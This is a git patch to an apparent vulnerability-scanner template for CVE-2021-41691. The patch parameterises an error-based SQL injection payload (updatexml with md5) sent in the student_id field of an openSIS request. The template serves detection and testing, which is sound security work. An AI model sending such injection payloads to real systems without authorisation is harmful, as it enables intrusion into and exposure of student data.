From d91d12a358ca5ca9203f41b4b4fe43f3bf418726 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 30 Jun 2022 09:15:56 +0530
Subject: [PATCH] Update CVE-2021-41691.yaml

---
 cves/2021/CVE-2021-41691.yaml | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/cves/2021/CVE-2021-41691.yaml b/cves/2021/CVE-2021-41691.yaml
index e4c0c19078..76f247c4d7 100644
--- a/cves/2021/CVE-2021-41691.yaml
+++ b/cves/2021/CVE-2021-41691.yaml
@@ -13,6 +13,9 @@ info:
     cve-id: CVE-2021-41691
   tags: cve,cve2021,opensis,sqli,auth
 
+variables:
+  num: "999999999"
+
 requests:
   - raw:
       - |
@@ -29,7 +32,7 @@ requests:
         Origin: {{BaseURL}}
         Content-Type: application/x-www-form-urlencoded
 
-        student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
+        student_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
 
     attack: pitchfork
     payloads: